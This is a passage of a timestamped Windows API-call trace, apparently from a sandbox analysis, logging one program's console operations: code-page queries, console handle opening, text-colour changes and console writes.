	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
	[0059.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.368] GetLastError () returned 0xcb
	[0059.368] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.369] GetLastError () returned 0xcb
	[0059.369] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.370] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.370] GetLastError () returned 0xcb
	[0059.370] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.371] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.371] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.371] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.371] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.371] GetConsoleOutputCP () returned 0x1b5
	[0059.371] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.371] GetLastError () returned 0xcb
	[0059.372] GetConsoleOutputCP () returned 0x1b5
	[0059.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.372] GetLastError () returned 0xcb
	[0059.372] GetConsoleOutputCP () returned 0x1b5
	[0059.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.372] GetLastError () returned 0xcb
	[0059.372] GetConsoleOutputCP () returned 0x1b5
	[0059.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.372] GetLastError () returned 0xcb
	[0059.372] GetConsoleOutputCP () returned 0x1b5
	[0059.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.372] GetLastError () returned 0xcb
	[0059.372] GetConsoleOutputCP () returned 0x1b5
	[0059.372] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe890, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe890) returned 0
	[0059.372] GetLastError () returned 0xcb
	[0059.379] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17
	[0059.379] GetLastError () returned 0xcb
	[0059.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0059.379] GetLastError () returned 0xcb
	[0059.380] GetConsoleOutputCP () returned 0x1b5
	[0059.380] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.380] GetLastError () returned 0xcb
	[0059.381] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0059.381] GetLastError () returned 0xcb
	[0059.381] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x55fe8e0 | out: lpMode=0x55fe8e0) returned 1
	[0059.381] GetLastError () returned 0xcb
	[0059.385] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b
	[0059.385] GetLastError () returned 0xcb
	[0059.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.386] GetLastError () returned 0xcb
	[0059.390] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f
	[0059.390] GetLastError () returned 0xcb
	[0059.390] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.390] GetLastError () returned 0xcb
	[0059.395] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.395] GetLastError () returned 0xcb
	[0059.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.395] GetLastError () returned 0xcb
	[0059.397] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0059.483] GetLastError () returned 0xcb
	[0059.489] CloseHandle (hObject=0x23) returned 1
	[0059.489] GetLastError () returned 0xcb
	[0059.494] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.494] GetLastError () returned 0xcb
	[0059.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.494] GetLastError () returned 0xcb
	[0059.494] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0059.495] GetLastError () returned 0xcb
	[0059.495] CloseHandle (hObject=0x23) returned 1
	[0059.495] GetLastError () returned 0xcb
	[0059.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0059.496] GetLastError () returned 0xcb
	[0059.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x55fe878 | out: lpMode=0x55fe878) returned 1
	[0059.496] GetLastError () returned 0xcb
	[0059.500] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.500] GetLastError () returned 0xcb
	[0059.500] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0059.500] GetLastError () returned 0xcb
	[0059.504] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x21cc160*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cc160*, lpNumberOfCharsWritten=0x55fe85c*=0x4f) returned 1
	[0059.504] GetLastError () returned 0xcb
	[0059.505] CloseHandle (hObject=0x23) returned 1
	[0059.505] GetLastError () returned 0xcb
	[0059.510] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.510] GetLastError () returned 0xcb
	[0059.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.510] GetLastError () returned 0xcb
	[0059.510] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0059.510] GetLastError () returned 0xcb
	[0059.510] CloseHandle (hObject=0x23) returned 1
	[0059.511] GetLastError () returned 0xcb
	[0059.515] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.515] GetLastError () returned 0xcb
	[0059.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.515] GetLastError () returned 0xcb
	[0059.515] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0059.515] GetLastError () returned 0xcb
	[0059.515] CloseHandle (hObject=0x23) returned 1
	[0059.516] GetLastError () returned 0xcb
	[0059.520] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.593] GetLastError () returned 0xcb
	[0059.593] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0059.593] GetLastError () returned 0xcb
	[0059.593] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0059.593] GetLastError () returned 0xcb
	[0059.593] CloseHandle (hObject=0x23) returned 1
	[0059.594] GetLastError () returned 0xcb
	[0059.599] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0059.599] GetLastError () returned 0xcb
	[0059.599] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0059.599] GetLastError () returned 0xcb
	[0059.599] GetConsoleOutputCP () returned 0x1b5
	[0059.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.599] GetLastError () returned 0xcb
	[0059.604] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27
	[0059.604] GetLastError () returned 0xcb
	[0059.604] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.604] GetLastError () returned 0xcb
	[0059.608] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b
	[0059.609] GetLastError () returned 0xcb
	[0059.609] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.610] GetLastError () returned 0xcb
	[0059.614] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.614] GetLastError () returned 0xcb
	[0059.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.614] GetLastError () returned 0xcb
	[0059.614] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0059.614] GetLastError () returned 0xcb
	[0059.614] CloseHandle (hObject=0x2f) returned 1
	[0059.615] GetLastError () returned 0xcb
	[0059.619] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.619] GetLastError () returned 0xcb
	[0059.619] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.619] GetLastError () returned 0xcb
	[0059.619] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0059.619] GetLastError () returned 0xcb
	[0059.619] CloseHandle (hObject=0x2f) returned 1
	[0059.620] GetLastError () returned 0xcb
	[0059.624] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.624] GetLastError () returned 0xcb
	[0059.624] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0059.624] GetLastError () returned 0xcb
	[0059.624] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x21cc884*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21cc884*, lpNumberOfCharsWritten=0x55fe85c*=0x4f) returned 1
	[0059.625] GetLastError () returned 0xcb
	[0059.625] CloseHandle (hObject=0x2f) returned 1
	[0059.625] GetLastError () returned 0xcb
	[0059.629] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.671] GetLastError () returned 0xcb
	[0059.671] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.671] GetLastError () returned 0xcb
	[0059.671] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0059.671] GetLastError () returned 0xcb
	[0059.671] CloseHandle (hObject=0x2f) returned 1
	[0059.671] GetLastError () returned 0xcb
	[0059.676] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.677] GetLastError () returned 0xcb
	[0059.677] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.677] GetLastError () returned 0xcb
	[0059.677] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0059.677] GetLastError () returned 0xcb
	[0059.677] CloseHandle (hObject=0x2f) returned 1
	[0059.677] GetLastError () returned 0xcb
	[0059.682] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.682] GetLastError () returned 0xcb
	[0059.682] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0059.682] GetLastError () returned 0xcb
	[0059.682] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0059.682] GetLastError () returned 0xcb
	[0059.682] CloseHandle (hObject=0x2f) returned 1
	[0059.683] GetLastError () returned 0xcb
	[0059.687] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0059.687] GetLastError () returned 0xcb
	[0059.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0059.688] GetLastError () returned 0xcb
	[0059.688] GetConsoleOutputCP () returned 0x1b5
	[0059.688] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.688] GetLastError () returned 0xcb
	[0059.692] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33
	[0059.692] GetLastError () returned 0xcb
	[0059.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.692] GetLastError () returned 0xcb
	[0059.697] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37
	[0059.697] GetLastError () returned 0xcb
	[0059.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.697] GetLastError () returned 0xcb
	[0059.701] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.701] GetLastError () returned 0xcb
	[0059.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.701] GetLastError () returned 0xcb
	[0059.701] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0059.702] GetLastError () returned 0xcb
	[0059.702] CloseHandle (hObject=0x3b) returned 1
	[0059.702] GetLastError () returned 0xcb
	[0059.706] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.780] GetLastError () returned 0xcb
	[0059.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x55fe810 | out: lpConsoleScreenBufferInfo=0x55fe810) returned 1
	[0059.780] GetLastError () returned 0xcb
	[0059.780] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0059.780] GetLastError () returned 0xcb
	[0059.781] CloseHandle (hObject=0x3b) returned 1
	[0059.781] GetLastError () returned 0xcb
	[0059.786] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.786] GetLastError () returned 0xcb
	[0059.786] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x55fe85c | out: lpMode=0x55fe85c) returned 1
	[0059.786] GetLastError () returned 0xcb
	[0059.786] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x21ccdb4*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x55fe85c, lpReserved=0x0 | out: lpBuffer=0x21ccdb4*, lpNumberOfCharsWritten=0x55fe85c*=0x3e) returned 1
	[0059.787] GetLastError () returned 0xcb
	[0059.787] CloseHandle (hObject=0x3b) returned 1
	[0059.787] GetLastError () returned 0xcb
	[0059.791] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.792] GetLastError () returned 0xcb
	[0059.792] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.792] GetLastError () returned 0xcb
	[0059.792] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0059.792] GetLastError () returned 0xcb
	[0059.792] CloseHandle (hObject=0x3b) returned 1
	[0059.792] GetLastError () returned 0xcb
	[0059.797] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.797] GetLastError () returned 0xcb
	[0059.797] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x55fe80c | out: lpConsoleScreenBufferInfo=0x55fe80c) returned 1
	[0059.797] GetLastError () returned 0xcb
	[0059.797] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0059.798] GetLastError () returned 0xcb
	[0059.798] CloseHandle (hObject=0x3b) returned 1
	[0059.798] GetLastError () returned 0xcb
	[0059.802] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.802] GetLastError () returned 0xcb
	[0059.802] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x55fe89c | out: lpMode=0x55fe89c) returned 1
	[0059.802] GetLastError () returned 0xcb
	[0059.802] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x1f19938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x55fe89c, lpReserved=0x0 | out: lpBuffer=0x1f19938*, lpNumberOfCharsWritten=0x55fe89c*=0x1) returned 1
	[0059.803] GetLastError () returned 0xcb
	[0059.803] CloseHandle (hObject=0x3b) returned 1
	[0059.803] GetLastError () returned 0xcb
	[0059.807] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0059.808] GetLastError () returned 0xcb
	[0059.808] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x55fe868 | out: lpConsoleScreenBufferInfo=0x55fe868) returned 1
	[0059.808] GetLastError () returned 0xcb
	[0059.808] GetConsoleOutputCP () returned 0x1b5
	[0059.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x55fe870, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x55fe870) returned 0
	[0059.808] GetLastError () returned 0xcb
	[0059.812] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f
	[0059.813] GetLastError () returned 0xcb
	[0059.813] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x55fe808 | out: lpConsoleScreenBufferInfo=0x55fe808) returned 1
	[0059.813] GetLastError () returned 0xcb
